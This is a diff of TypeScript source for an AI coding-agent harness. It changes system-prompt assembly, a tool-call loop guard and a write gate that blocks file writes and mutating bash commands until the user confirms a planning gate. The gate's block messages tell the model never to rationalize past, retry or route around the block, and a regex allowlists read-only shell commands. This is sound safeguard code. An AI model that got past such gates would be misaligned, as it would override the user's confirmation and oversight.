 import { resolveAllSkillReferences, renderPreferencesForSystemPrompt, loadEffectiveGSDPreferences } from "../preferences.js";
+import { resolveSkillReference } from "../preferences-skills.js";
 import { resolveGsdRootFile, resolveSliceFile, resolveSlicePath, resolveTaskFile, resolveTaskFiles, resolveTasksDir, relSliceFile, relSlicePath, relTaskFile } from "../paths.js";
+import { ensureCodebaseMapFresh, readCodebaseMap } from "../codebase-generator.js";
 import { hasSkillSnapshot, detectNewSkills, formatSkillsXml } from "../skill-discovery.js";
 import { getActiveAutoWorktreeContext } from "../auto-worktree.js";
 import { getActiveWorktreeName, getWorktreeOriginalCwd } from "../worktree-command.js";
 import { deriveState } from "../state.js";
-import { formatOverridesSection, loadActiveOverrides, loadFile, parseContinue, parseSummary } from "../files.js";
+import { formatOverridesSection, formatShortcut, loadActiveOverrides, loadFile, parseContinue, parseSummary } from "../files.js";
 import { toPosixPath } from "../../shared/mod.js";
 import { markCmuxPromptShown, shouldPromptToEnableCmux } from "../../cmux/index.js";
 
 const gsdHome = process.env.GSD_HOME || join(homedir(), ".gsd");
 
+/**
+ * Bundled skill triggers — resolved dynamically at runtime instead of
+ * hardcoding absolute paths in the system prompt template. Only skills
+ * that actually exist on disk are included in the table. (#3575)
+ */
+const BUNDLED_SKILL_TRIGGERS: Array<{ trigger: string; skill: string }> = [
+  { trigger: "Frontend UI - web components, pages, landing pages, dashboards, React/HTML/CSS, styling", skill: "frontend-design" },
+  { trigger: "macOS or iOS apps - SwiftUI, Xcode, App Store", skill: "swiftui" },
+  { trigger: "Debugging - complex bugs, failing tests, root-cause investigation after standard approaches fail", skill: "debug-like-expert" },
+];
+
+function buildBundledSkillsTable(): string {
+  const cwd = process.cwd();
+  const rows: string[] = [];
+  for (const { trigger, skill } of BUNDLED_SKILL_TRIGGERS) {
+    const resolution = resolveSkillReference(skill, cwd);
+    if (resolution.method === "unresolved") continue; // skill not installed — omit from prompt
+    rows.push(`| ${trigger} | \`${resolution.resolvedPath}\` |`);
+  }
+  if (rows.length === 0) {
+    return "*No bundled skills found. Install skills to `~/.agents/skills/` or `~/.claude/skills/`.*";
+  }
+  return `| Trigger | Skill to load |\n|---|---|\n${rows.join("\n")}`;
+}
+
 function warnDeprecatedAgentInstructions(): void {
   const paths = [
     join(gsdHome, "agent-instructions.md"),
@@ -41,7 +70,12 @@ export async function buildBeforeAgentStartResult(
   if (!existsSync(join(process.cwd(), ".gsd"))) return undefined;
 
   const stopContextTimer = debugTime("context-inject");
-  const systemContent = loadPrompt("system");
+  const systemContent = loadPrompt("system", {
+    bundledSkillsTable: buildBundledSkillsTable(),
+    templatesDir: getTemplatesDir(),
+    shortcutDashboard: formatShortcut("Ctrl+Alt+G"),
+    shortcutShell: formatShortcut("Ctrl+Alt+B"),
+  });
   const loadedPreferences = loadEffectiveGSDPreferences();
   if (shouldPromptToEnableCmux(loadedPreferences?.preferences)) {
     markCmuxPromptShown();
@@ -64,17 +98,12 @@ export async function buildBeforeAgentStartResult(
     }
   }
 
-  let knowledgeBlock = "";
-  const knowledgePath = resolveGsdRootFile(process.cwd(), "KNOWLEDGE");
-  if (existsSync(knowledgePath)) {
-    try {
-      const content = readFileSync(knowledgePath, "utf-8").trim();
-      if (content) {
-        knowledgeBlock = `\n\n[PROJECT KNOWLEDGE — Rules, patterns, and lessons learned]\n\n${content}`;
-      }
-    } catch {
-      // skip
-    }
+  const { block: knowledgeBlock, globalSizeKb } = loadKnowledgeBlock(gsdHome, process.cwd());
+  if (globalSizeKb > 4) {
+    ctx.ui.notify(
+      `GSD: ~/.gsd/agent/KNOWLEDGE.md is ${globalSizeKb.toFixed(1)}KB — consider trimming to keep system prompt lean.`,
+      "warning",
+    );
   }
 
   let memoryBlock = "";
@@ -87,8 +116,8 @@ export async function buildBeforeAgentStartResult(
         memoryBlock = `\n\n${formatted}`;
       }
     }
-  } catch {
-    // non-fatal
+  } catch (e) {
+    logWarning("bootstrap", `memory block fetch failed: ${(e as Error).message}`);
   }
 
   let newSkillsBlock = "";
@@ -99,30 +128,110 @@ export async function buildBeforeAgentStartResult(
     }
   }
 
+  let codebaseBlock = "";
+  try {
+    const codebaseOptions = loadedPreferences?.preferences?.codebase
+      ? {
+          excludePatterns: loadedPreferences.preferences.codebase.exclude_patterns,
+          maxFiles: loadedPreferences.preferences.codebase.max_files,
+          collapseThreshold: loadedPreferences.preferences.codebase.collapse_threshold,
+        }
+      : undefined;
+    ensureCodebaseMapFresh(process.cwd(), codebaseOptions);
+  } catch (e) {
+    logWarning("bootstrap", `CODEBASE refresh failed: ${(e as Error).message}`);
+  }
+
+  const codebasePath = resolveGsdRootFile(process.cwd(), "CODEBASE");
+  const rawCodebase = readCodebaseMap(process.cwd());
+  if (existsSync(codebasePath) && rawCodebase) {
+    try {
+      const rawContent = rawCodebase.trim();
+      if (rawContent) {
+        // Cap injection size to ~2 000 tokens to avoid bloating every request.
+        // Full map is always available at .gsd/CODEBASE.md.
+        const MAX_CODEBASE_CHARS = 8_000;
+        const generatedMatch = rawContent.match(/Generated: (\S+)/);
+        const generatedAt = generatedMatch?.[1] ?? "unknown";
+        const content = rawContent.length > MAX_CODEBASE_CHARS
+          ? rawContent.slice(0, MAX_CODEBASE_CHARS) + "\n\n*(truncated — see .gsd/CODEBASE.md for full map)*"
+          : rawContent;
+        codebaseBlock = `\n\n[PROJECT CODEBASE — File structure and descriptions (generated ${generatedAt}, auto-refreshed when GSD detects tracked file changes; use /gsd codebase stats for status)]\n\n${content}`;
+      }
+    } catch (e) {
+      logWarning("bootstrap", `CODEBASE file read failed: ${(e as Error).message}`);
+    }
+  }
+
   warnDeprecatedAgentInstructions();
 
   const injection = await buildGuidedExecuteContextInjection(event.prompt, process.cwd());
+
+  // Re-inject forensics context on follow-up turns (#2941)
+  const forensicsInjection = !injection ? buildForensicsContextInjection(process.cwd()) : null;
+
   const worktreeBlock = buildWorktreeContextBlock();
-  const fullSystem = `${event.systemPrompt}\n\n[SYSTEM CONTEXT — GSD]\n\n${systemContent}${preferenceBlock}${knowledgeBlock}${memoryBlock}${newSkillsBlock}${worktreeBlock}`;
+  const fullSystem = `${event.systemPrompt}\n\n[SYSTEM CONTEXT — GSD]\n\n${systemContent}${preferenceBlock}${knowledgeBlock}${codebaseBlock}${memoryBlock}${newSkillsBlock}${worktreeBlock}`;
 
   stopContextTimer({
     systemPromptSize: fullSystem.length,
-    injectionSize: injection?.length ?? 0,
+    injectionSize: injection?.length ?? forensicsInjection?.length ?? 0,
     hasPreferences: preferenceBlock.length > 0,
     hasNewSkills: newSkillsBlock.length > 0,
   });
 
+  // Determine which context message to inject (guided execute takes priority)
+  const contextMessage = injection
+    ? { customType: "gsd-guided-context", content: injection, display: false as const }
+    : forensicsInjection
+      ? { customType: "gsd-forensics", content: forensicsInjection, display: false as const }
+      : null;
+
   return {
     systemPrompt: fullSystem,
-    ...(injection
-      ? {
-        message: {
-          customType: "gsd-guided-context",
-          content: injection,
-          display: false as const,
-        },
+    ...(contextMessage ? { message: contextMessage } : {}),
+  };
+}
+
+export function loadKnowledgeBlock(gsdHomeDir: string, cwd: string): { block: string; globalSizeKb: number } {
+  // 1. Global knowledge (~/.gsd/agent/KNOWLEDGE.md) — cross-project, user-maintained
+  let globalKnowledge = "";
+  let globalSizeKb = 0;
+  const globalKnowledgePath = join(gsdHomeDir, "agent", "KNOWLEDGE.md");
+  if (existsSync(globalKnowledgePath)) {
+    try {
+      const content = readFileSync(globalKnowledgePath, "utf-8").trim();
+      if (content) {
+        globalSizeKb = Buffer.byteLength(content, "utf-8") / 1024;
+        globalKnowledge = content;
       }
-      : {}),
+    } catch (e) {
+      logWarning("bootstrap", `global knowledge file read failed: ${(e as Error).message}`);
+    }
+  }
+
+  // 2. Project knowledge (.gsd/KNOWLEDGE.md) — project-specific
+  let projectKnowledge = "";
+  const knowledgePath = resolveGsdRootFile(cwd, "KNOWLEDGE");
+  if (existsSync(knowledgePath)) {
+    try {
+      const content = readFileSync(knowledgePath, "utf-8").trim();
+      if (content) projectKnowledge = content;
+    } catch (e) {
+      logWarning("bootstrap", `project knowledge file read failed: ${(e as Error).message}`);
+    }
+  }
+
+  if (!globalKnowledge && !projectKnowledge) {
+    return { block: "", globalSizeKb: 0 };
+  }
+
+  const parts: string[] = [];
+  if (globalKnowledge) parts.push(`## Global Knowledge\n\n${globalKnowledge}`);
+  if (projectKnowledge) parts.push(`## Project Knowledge\n\n${projectKnowledge}`);
+  return {
+    block: `\n\n[KNOWLEDGE — Rules, patterns, and lessons learned]\n\n${parts.join("\n\n")}`,
+    globalSizeKb,
   };
 }
 
@@ -172,6 +281,13 @@ function buildWorktreeContextBlock(): string {
   return "";
 }
 
+/**
+ * Low-entropy resume intent patterns — short phrases a user types to
+ * continue work after a pause, rate limit, or context reset (#3615).
+ * Tested against the trimmed, lowercased prompt with trailing punctuation stripped.
+ */
+const RESUME_INTENT_PATTERNS = /^(continue|resume|ok|go|go ahead|proceed|keep going|carry on|next|yes|yeah|yep|sure|do it|let's go|pick up where you left off)$/;
+
 async function buildGuidedExecuteContextInjection(prompt: string, basePath: string): Promise<string | null> {
   const executeMatch = prompt.match(/Execute the next task:\s+(T\d+)\s+\("([^"]+)"\)\s+in slice\s+(S\d+)\s+of milestone\s+(M\d+(?:-[a-z0-9]{6})?)/i);
   if (executeMatch) {
@@ -188,6 +304,27 @@ async function buildGuidedExecuteContextInjection(prompt: string, basePath: stri
     }
   }
 
+  // Fallback: low-entropy resume prompt (e.g., "continue", "ok", "go ahead")
+  // during an active executing task — inject task context so the agent
+  // doesn't rebuild from scratch (#3615).
+  // Intent-gated: only fire for short, resume-like prompts to avoid hijacking
+  // control/help/diagnostic prompts with unrelated execution context.
+  // Phase-gated: only fire during "executing" to avoid misrouting during
+  // replanning, gate evaluation, or other non-execution phases.
+  const trimmed = prompt.trim().toLowerCase().replace(/[.!?,]+$/g, "");
+  if (RESUME_INTENT_PATTERNS.test(trimmed)) {
+    const state = await deriveState(basePath);
+    if (state.phase === "executing" && state.activeTask && state.activeMilestone && state.activeSlice) {
+      return buildTaskExecutionContextInjection(
+        basePath,
+        state.activeMilestone.id,
+        state.activeSlice.id,
+        state.activeTask.id,
+        state.activeTask.title,
+      );
+    }
+  }
+
   return null;
 }
 
@@ -338,3 +475,37 @@ function oneLine(text: string): string {
   return text.replace(/\s+/g, " ").trim();
 }
 
+// ─── Forensics Context Re-injection (#2941) ──────────────────────────────────
+
+/**
+ * Check for an active forensics session and return the prompt content
+ * so it can be re-injected on follow-up turns.
+ */
+function buildForensicsContextInjection(basePath: string): string | null {
+  const marker = readForensicsMarker(basePath);
+  if (!marker) return null;
+
+  // Expire markers older than 2 hours to avoid stale context
+  const age = Date.now() - new Date(marker.createdAt).getTime();
+  if (age > 2 * 60 * 60 * 1000) {
+    clearForensicsMarker(basePath);
+    return null;
+  }
+
+  return marker.promptContent;
+}
+
+/**
+ * Remove the active forensics marker file, e.g. when the investigation
+ * is complete or the session expires.
+ */
+export function clearForensicsMarker(basePath: string): void {
+  const markerPath = join(basePath, ".gsd", "runtime", "active-forensics.json");
+  if (existsSync(markerPath)) {
+    try {
+      unlinkSync(markerPath);
+    } catch (e) {
+      logWarning("bootstrap", `unlinkSync forensics marker failed: ${(e as Error).message}`);
+    }
+  }
+}
diff --git a/src/resources/extensions/gsd/bootstrap/tool-call-loop-guard.ts b/src/resources/extensions/gsd/bootstrap/tool-call-loop-guard.ts
index 695c7e746..4d325fbf1 100644
--- a/src/resources/extensions/gsd/bootstrap/tool-call-loop-guard.ts
+++ b/src/resources/extensions/gsd/bootstrap/tool-call-loop-guard.ts
@@ -16,8 +16,13 @@ import { createHash } from "node:crypto";
 
 const MAX_CONSECUTIVE_IDENTICAL_CALLS = 4;
 
+/** Interactive/user-facing tools where even 1 duplicate is confusing. */
+const STRICT_LOOP_TOOLS = new Set(["ask_user_questions"]);
+const MAX_CONSECUTIVE_STRICT = 1;
+
 let consecutiveCount = 0;
 let lastSignature = "";
+let lastToolName = "";
 let enabled = true;
 
 /** Hash tool name + args into a compact signature for comparison. */
@@ -55,9 +60,14 @@ export function checkToolCallLoop(
   } else {
     consecutiveCount = 1;
     lastSignature = sig;
+    lastToolName = toolName;
   }
 
-  if (consecutiveCount > MAX_CONSECUTIVE_IDENTICAL_CALLS) {
+  const threshold = STRICT_LOOP_TOOLS.has(toolName)
+    ? MAX_CONSECUTIVE_STRICT
+    : MAX_CONSECUTIVE_IDENTICAL_CALLS;
+
+  if (consecutiveCount > threshold) {
     return {
       block: true,
       reason:
@@ -75,6 +85,7 @@ export function checkToolCallLoop(
 export function resetToolCallLoopGuard(): void {
   consecutiveCount = 0;
   lastSignature = "";
+  lastToolName = "";
   enabled = true;
 }
 
@@ -83,6 +94,7 @@ export function disableToolCallLoopGuard(): void {
   enabled = false;
   consecutiveCount = 0;
   lastSignature = "";
+  lastToolName = "";
 }
 
 /** Get current consecutive count for diagnostics. */
diff --git a/src/resources/extensions/gsd/bootstrap/write-gate.ts b/src/resources/extensions/gsd/bootstrap/write-gate.ts
index 75a964021..959c8a78f 100644
--- a/src/resources/extensions/gsd/bootstrap/write-gate.ts
+++ b/src/resources/extensions/gsd/bootstrap/write-gate.ts
@@ -1,10 +1,80 @@
 const MILESTONE_CONTEXT_RE = /M\d+(?:-[a-z0-9]{6})?-CONTEXT\.md$/;
+const CONTEXT_MILESTONE_RE = /(?:^|[/\\])(M\d+(?:-[a-z0-9]{6})?)-CONTEXT\.md$/i;
+const DEPTH_VERIFICATION_MILESTONE_RE = /depth_verification[_-](M\d+(?:-[a-z0-9]{6})?)/i;
 
-let depthVerificationDone = false;
+/**
+ * Path segment that identifies .gsd/ planning artifacts.
+ * Writes to these paths are allowed during queue mode.
+ */
+const GSD_DIR_RE = /(^|[/\\])\.gsd([/\\]|$)/;
+
+/**
+ * Read-only tool names that are always safe during queue mode.
+ */
+const QUEUE_SAFE_TOOLS = new Set([
+  "read", "grep", "find", "ls", "glob",
+  // Discussion & planning tools
+  "ask_user_questions",
+  "gsd_milestone_generate_id",
+  "gsd_summary_save",
+  // Web research tools used during queue discussion
+  "search-the-web", "resolve_library", "get_library_docs", "fetch_page",
+  "search_and_read",
+]);
+
+/**
+ * Bash commands that are read-only / investigative — safe during queue mode.
+ * Matches the leading command in a bash invocation.
+ */
+const BASH_READ_ONLY_RE = /^\s*(cat|head|tail|less|more|wc|file|stat|du|df|which|type|echo|printf|ls|find|grep|rg|awk|sed\b(?!.*-i)|sort|uniq|diff|comm|tr|cut|tee\s+-a\s+\/dev\/null|git\s+(log|show|diff|status|branch|tag|remote|rev-parse|ls-files|blame|shortlog|describe|stash\s+list|config\s+--get|cat-file)|gh\s+(issue|pr|api|repo|release)\s+(view|list|diff|status|checks)|mkdir\s+-p\s+\.gsd|rtk\s)/;
+
+const verifiedDepthMilestones = new Set<string>();
 let activeQueuePhase = false;
 
+/**
+ * Discussion gate enforcement state.
+ *
+ * When ask_user_questions is called with a recognized gate question ID,
+ * we track the pending gate. Until the gate is confirmed (user selects the
+ * first/recommended option), all non-read-only tool calls are blocked.
+ * This mechanically prevents the model from rationalizing past failed or
+ * cancelled gate questions.
+ */
+let pendingGateId: string | null = null;
+
+/**
+ * Recognized gate question ID patterns.
+ * These appear in both discuss-prepared.md (4-layer) and discuss.md (depth/requirements/roadmap).
+ */
+const GATE_QUESTION_PATTERNS = [
+  "layer1_scope_gate",
+  "layer2_architecture_gate",
+  "layer3_error_gate",
+  "layer4_quality_gate",
+  "depth_verification",
+] as const;
+
+/**
+ * Tools that are safe to call while a gate is pending.
+ * Includes read-only tools and ask_user_questions itself (so the model can re-ask).
+ */
+const GATE_SAFE_TOOLS = new Set([
+  "ask_user_questions",
+  "read", "grep", "find", "ls", "glob",
+  "search-the-web", "resolve_library", "get_library_docs", "fetch_page",
+  "search_and_read",
+]);
+
 export function isDepthVerified(): boolean {
-  return depthVerificationDone;
+  return verifiedDepthMilestones.size > 0;
+}
+
+/**
+ * Check whether a specific milestone has passed depth verification.
+ */
+export function isMilestoneDepthVerified(milestoneId: string | null | undefined): boolean {
+  if (!milestoneId) return false;
+  return verifiedDepthMilestones.has(milestoneId);
 }
 
 export function isQueuePhaseActive(): boolean {
@@ -16,36 +86,269 @@ export function setQueuePhaseActive(active: boolean): void {
 }
 
 export function resetWriteGateState(): void {
-  depthVerificationDone = false;
+  verifiedDepthMilestones.clear();
+  pendingGateId = null;
 }
 
 export function clearDiscussionFlowState(): void {
-  depthVerificationDone = false;
+  verifiedDepthMilestones.clear();
   activeQueuePhase = false;
+  pendingGateId = null;
 }
 
-export function markDepthVerified(): void {
-  depthVerificationDone = true;
+export function markDepthVerified(milestoneId?: string | null): void {
+  if (!milestoneId) return;
+  verifiedDepthMilestones.add(milestoneId);
+}
+
+/**
+ * Check whether a question ID matches a recognized gate pattern.
+ */
+export function isGateQuestionId(questionId: string): boolean {
+  return GATE_QUESTION_PATTERNS.some(pattern => questionId.includes(pattern));
+}
+
+/**
+ * Extract the milestone ID embedded in a depth-verification question id.
+ * Prompts are expected to use ids like `depth_verification_M001_confirm`.
+ */
+export function extractDepthVerificationMilestoneId(questionId: string): string | null {
+  const match = questionId.match(DEPTH_VERIFICATION_MILESTONE_RE);
+  return match?.[1] ?? null;
+}
+
+/**
+ * Extract the milestone ID from a milestone CONTEXT file path.
+ */
+function extractContextMilestoneId(inputPath: string): string | null {
+  const match = inputPath.match(CONTEXT_MILESTONE_RE);
+  return match?.[1] ?? null;
+}
+
+/**
+ * Mark a gate as pending (called when ask_user_questions is invoked with a gate ID).
+ */
+export function setPendingGate(gateId: string): void {
+  pendingGateId = gateId;
+}
+
+/**
+ * Clear the pending gate (called when the user confirms).
+ */
+export function clearPendingGate(): void {
+  pendingGateId = null;
+}
+
+/**
+ * Get the currently pending gate, if any.
+ */
+export function getPendingGate(): string | null {
+  return pendingGateId;
+}
+
+/**
+ * Check whether a tool call should be blocked because a discussion gate
+ * is pending (ask_user_questions was called but not confirmed).
+ *
+ * Returns { block: true, reason } if the tool should be blocked.
+ * Read-only tools and ask_user_questions itself are always allowed.
+ */
+export function shouldBlockPendingGate(
+  toolName: string,
+  _milestoneId: string | null,
+  _queuePhaseActive?: boolean,
+): { block: boolean; reason?: string } {
+  if (!pendingGateId) return { block: false };
+
+  if (GATE_SAFE_TOOLS.has(toolName)) return { block: false };
+
+  // Bash read-only commands are also safe
+  if (toolName === "bash") return { block: false }; // bash is checked separately below
+
+  return {
+    block: true,
+    reason: [
+      `HARD BLOCK: Discussion gate "${pendingGateId}" has not been confirmed by the user.`,
+      `You MUST re-call ask_user_questions with the gate question before making any other tool calls.`,
+      `If the previous ask_user_questions call failed, errored, was cancelled, or the user's response`,
+      `did not match a provided option, you MUST re-ask — never rationalize past the block.`,
+      `Do NOT proceed, do NOT use alternative approaches, do NOT skip the gate.`,
+    ].join(" "),
+  };
+}
+
+/**
+ * Check whether a bash command should be blocked because a discussion gate is pending.
+ * Read-only bash commands are allowed; mutating commands are blocked.
+ */
+export function shouldBlockPendingGateBash(
+  command: string,
+  _milestoneId: string | null,
+  _queuePhaseActive?: boolean,
+): { block: boolean; reason?: string } {
+  if (!pendingGateId) return { block: false };
+
+  // Allow read-only bash commands
+  if (BASH_READ_ONLY_RE.test(command)) return { block: false };
+
+  return {
+    block: true,
+    reason: [
+      `HARD BLOCK: Discussion gate "${pendingGateId}" has not been confirmed by the user.`,
+      `You MUST re-call ask_user_questions with the gate question before running mutating commands.`,
+      `If the previous ask_user_questions call failed, errored, was cancelled, or the user's response`,
+      `did not match a provided option, you MUST re-ask — never rationalize past the block.`,
+    ].join(" "),
+  };
+}
+
+/**
+ * Check whether a depth_verification answer confirms the discussion is complete.
+ * Uses structural validation: the selected answer must exactly match the first
+ * option label from the question definition (the confirmation option by convention).
+ * This rejects free-form "Other" text, decline options, and garbage input without
+ * coupling to any specific label substring.
+ *
+ * @param selected  The answer's selected value from details.response.answers[id].selected
+ * @param options   The question's options array from event.input.questions[n].options
+ */
+export function isDepthConfirmationAnswer(
+  selected: unknown,
+  options?: Array<{ label?: string }>,
+): boolean {
+  const value = Array.isArray(selected) ? selected[0] : selected;
+  if (typeof value !== "string" || !value) return false;
+
+  // If options are available, structurally validate: selected must exactly match
+  // the first option (confirmation) label. Rejects free-form "Other" and decline options.
+  if (Array.isArray(options) && options.length > 0) {
+    const confirmLabel = options[0]?.label;
+    return typeof confirmLabel === "string" && value === confirmLabel;
+  }
+
+  // Fallback when options aren't available (e.g., older call sites):
+  // accept only if it contains "(Recommended)" — the prompt convention suffix.
+  return value.includes("(Recommended)");
 }
 
 export function shouldBlockContextWrite(
   toolName: string,
   inputPath: string,
   milestoneId: string | null,
-  depthVerified: boolean,
-  queuePhaseActive?: boolean,
+  _queuePhaseActive?: boolean,
 ): { block: boolean; reason?: string } {
   if (toolName !== "write") return { block: false };
-
-  const inDiscussion = milestoneId !== null;
-  const inQueue = queuePhaseActive ?? false;
-  if (!inDiscussion && !inQueue) return { block: false };
   if (!MILESTONE_CONTEXT_RE.test(inputPath)) return { block: false };
-  if (depthVerified) return { block: false };
+
+  const targetMilestoneId = extractContextMilestoneId(inputPath) ?? milestoneId;
+  if (!targetMilestoneId) {
+    return {
+      block: true,
+      reason: [
+        `HARD BLOCK: Cannot write milestone CONTEXT.md without knowing which milestone it belongs to.`,
+        `This is a mechanical gate — you MUST NOT proceed, retry, or rationalize past this block.`,
+        `Required action: call ask_user_questions with question id containing "depth_verification" and the milestone id.`,
+      ].join(" "),
+    };
+  }
+
+  if (isMilestoneDepthVerified(targetMilestoneId)) return { block: false };
 
   return {
     block: true,
-    reason: `Blocked: Cannot write to milestone CONTEXT.md during discussion phase without depth verification. Call ask_user_questions with question id "depth_verification" first to confirm discussion depth before writing context.`,
+    reason: [
+      `HARD BLOCK: Cannot write to milestone CONTEXT.md without depth verification.`,
+      `This is a mechanical gate — you MUST NOT proceed, retry, or rationalize past this block.`,
+      `Required action: call ask_user_questions with question id containing "depth_verification".`,
+      `The user MUST select the "(Recommended)" confirmation option to unlock this gate.`,
+      `If the user declines, cancels, or the tool fails, you must re-ask — not bypass.`,
+    ].join(" "),
   };
 }
 
+/**
+ * Check whether a gsd_summary_save CONTEXT artifact should be blocked.
+ * Slice-level CONTEXT artifacts are allowed; milestone-level CONTEXT writes
+ * require the milestone to be depth-verified first.
+ */
+export function shouldBlockContextArtifactSave(
+  artifactType: string,
+  milestoneId: string | null,
+  sliceId?: string | null,
+): { block: boolean; reason?: string } {
+  if (artifactType !== "CONTEXT") return { block: false };
+  if (sliceId) return { block: false };
+  if (!milestoneId) {
+    return {
+      block: true,
+      reason: [
+        `HARD BLOCK: Cannot save milestone CONTEXT without a milestone_id.`,
+        `This is a mechanical gate — you MUST NOT proceed, retry, or rationalize past this block.`,
+      ].join(" "),
+    };
+  }
+  if (isMilestoneDepthVerified(milestoneId)) return { block: false };
+
+  return {
+    block: true,
+    reason: [
+      `HARD BLOCK: Cannot save milestone CONTEXT without depth verification for ${milestoneId}.`,
+      `This is a mechanical gate — you MUST NOT proceed, retry, or rationalize past this block.`,
+      `Required action: call ask_user_questions with question id containing "depth_verification_${milestoneId}".`,
+      `The user MUST select the "(Recommended)" confirmation option to unlock this gate.`,
+    ].join(" "),
+  };
+}
+
+/**
+ * Queue-mode execution guard (#2545).
+ *
+ * When the queue phase is active, the agent should only create planning
+ * artifacts (milestones, CONTEXT.md, QUEUE.md, etc.) — never execute work.
+ * This function blocks write/edit/bash tool calls that would modify source
+ * code outside of .gsd/.
+ *
+ * @param toolName  The tool being called (write, edit, bash, etc.)
+ * @param input     For write/edit: the file path. For bash: the command string.
+ * @param queuePhaseActive  Whether the queue phase is currently active.
+ * @returns { block, reason } — block=true if the call should be rejected.
+ */
+export function shouldBlockQueueExecution(
+  toolName: string,
+  input: string,
+  queuePhaseActive: boolean,
+): { block: boolean; reason?: string } {
+  if (!queuePhaseActive) return { block: false };
+
+  // Always-safe tools (read-only, discussion, planning)
+  if (QUEUE_SAFE_TOOLS.has(toolName)) return { block: false };
+
+  // write/edit — allow if targeting .gsd/ planning artifacts
+  if (toolName === "write" || toolName === "edit") {
+    if (GSD_DIR_RE.test(input)) return { block: false };
+    return {
+      block: true,
+      reason: `Blocked: /gsd queue is a planning tool — it creates milestones, not executes work. ` +
+        `Cannot ${toolName} to "${input}" during queue mode. ` +
+        `Write CONTEXT.md files and update PROJECT.md/QUEUE.md instead.`,
+    };
+  }
+
+  // bash — allow read-only/investigative commands, block everything else
+  if (toolName === "bash") {
+    if (BASH_READ_ONLY_RE.test(input)) return { block: false };
+    return {
+      block: true,
+      reason: `Blocked: /gsd queue is a planning tool — it creates milestones, not executes work. ` +
+        `Cannot run "${input.slice(0, 80)}${input.length > 80 ? "…" : ""}" during queue mode. ` +
+        `Use read-only commands (cat, grep, git log, etc.) to investigate, then write planning artifacts.`,
+    };
+  }
+
+  // Unknown tools — block by default in queue mode so custom tools cannot
+  // bypass execution restrictions.
+  return {
+    block: true,
+    reason: `Blocked: /gsd queue is a planning tool — it creates milestones, not executes work. Unknown tools are not permitted during queue mode.`,
+  };
+}
diff --git a/src/resources/extensions/gsd/branch-patterns.ts b/src/resources/extensions/gsd/branch-patterns.ts
new file mode 100644
index 000000000..70d8a40ab
--- /dev/null
+++ b/src/resources/extensions/gsd/branch-patterns.ts
@@ -0,0 +1,16 @@
+/**
+ * GSD branch naming patterns — single source of truth.
+ *
+ * gsd/<worktree>/<milestone>/<slice>  → SLICE_BRANCH_RE
+ * gsd/quick/<id>-<slug>               → QUICK_BRANCH_RE
+ * gsd/<workflow>/<...>                 → WORKFLOW_BRANCH_RE (non-milestone gsd/ branches)
+ */
+
+/** Matches gsd/ slice branches: gsd/[worktree/]M001[-hash]/S01 */
+export const SLICE_BRANCH_RE = /^gsd\/(?:([a-zA-Z0-9_-]+)\/)?(M\d+(?:-[a-z0-9]{6})?)\/(S\d+)$/;
+
+/** Matches gsd/quick/ task branches */
+export const QUICK_BRANCH_RE = /^gsd\/quick\//;
+
+/** Matches gsd/ workflow branches (non-milestone, e.g. gsd/workflow-name/...) */
+export const WORKFLOW_BRANCH_RE = /^gsd\/(?!M\d)[\w-]+\//;
diff --git a/src/resources/extensions/gsd/captures.ts b/src/resources/extensions/gsd/captures.ts
index 72447876e..2de7278b7 100644
--- a/src/resources/extensions/gsd/captures.ts
+++ b/src/resources/extensions/gsd/captures.ts
@@ -15,7 +15,7 @@ import { gsdRoot } from "./paths.js";
 
 // ─── Types ────────────────────────────────────────────────────────────────────
 
-export type Classification = "quick-task" | "inject" | "defer" | "replan" | "note";
+export type Classification = "quick-task" | "inject" | "defer" | "replan" | "note" | "stop" | "backtrack";
 
 export interface CaptureEntry {
   id: string;
@@ -26,6 +26,7 @@ export interface CaptureEntry {
   resolution?: string;
   rationale?: string;
   resolvedAt?: string;
+  resolvedInMilestone?: string;
   executed?: boolean;
 }
 
@@ -41,7 +42,7 @@ export interface TriageResult {
 
 const CAPTURES_FILENAME = "CAPTURES.md";
 const VALID_CLASSIFICATIONS: readonly string[] = [
-  "quick-task", "inject", "defer", "replan", "note",
+  "quick-task", "inject", "defer", "replan", "note", "stop", "backtrack",
 ];
 
 // ─── Path Resolution ──────────────────────────────────────────────────────────
@@ -176,6 +177,7 @@ export function markCaptureResolved(
   classification: Classification,
   resolution: string,
   rationale: string,
+  milestoneId?: string,
 ): void {
   const filePath = resolveCapturesPath(basePath);
   if (!existsSync(filePath)) return;
@@ -206,13 +208,17 @@ export function markCaptureResolved(
     `**Rationale:** ${rationale}`,
     `**Resolved:** ${resolvedAt}`,
   ];
+  if (milestoneId) {
+    newFields.push(`**Milestone:** ${milestoneId}`);
+  }
 
-  // Remove any existing classification/resolution/rationale/resolved fields
+  // Remove any existing classification/resolution/rationale/resolved/milestone fields
   // (in case of re-triage)
   section = section.replace(/\*\*Classification:\*\*\s*.+\n?/g, "");
   section = section.replace(/\*\*Resolution:\*\*\s*.+\n?/g, "");
   section = section.replace(/\*\*Rationale:\*\*\s*.+\n?/g, "");
   section = section.replace(/\*\*Resolved:\*\*\s*.+\n?/g, "");
+  section = section.replace(/\*\*Milestone:\*\*\s*.+\n?/g, "");
 
   // Add new fields after Status line
   section = section.trimEnd() + "\n" + newFields.join("\n") + "\n";
@@ -255,18 +261,139 @@ export function markCaptureExecuted(basePath: string, captureId: string): void {
  * Load resolved captures that have actionable classifications (inject, replan,
  * quick-task) but have NOT yet been executed.
  * These are captures whose resolutions need to be carried out.
+ *
+ * When `currentMilestoneId` is provided, captures resolved in a *different*
+ * milestone are treated as stale and excluded.  This prevents quick-task
+ * captures from a prior milestone re-executing after the underlying issues
+ * were already fixed by planned milestone work (#2872).
+ *
+ * Captures that have no `resolvedInMilestone` (legacy captures resolved before
+ * this field was introduced) are always included for backward compatibility.
  */
-export function loadActionableCaptures(basePath: string): CaptureEntry[] {
+export function loadActionableCaptures(basePath: string, currentMilestoneId?: string): CaptureEntry[] {
   return loadAllCaptures(basePath).filter(
     c =>
       c.status === "resolved" &&
       !c.executed &&
       (c.classification === "inject" ||
         c.classification === "replan" ||
-        c.classification === "quick-task"),
+        c.classification === "quick-task") &&
+      // Staleness gate: exclude captures resolved in a different milestone (#2872)
+      (!currentMilestoneId ||
+        !c.resolvedInMilestone ||
+        c.resolvedInMilestone === currentMilestoneId),
   );
 }
 
+/**
+ * Load unexecuted stop captures — user directives to halt auto-mode.
+ * These are checked in the pre-dispatch guard pipeline (runGuards) to
+ * pause auto-mode before the next unit is dispatched.
+ */
+export function loadStopCaptures(basePath: string): CaptureEntry[] {
+  return loadAllCaptures(basePath).filter(
+    c => c.status === "resolved" && !c.executed &&
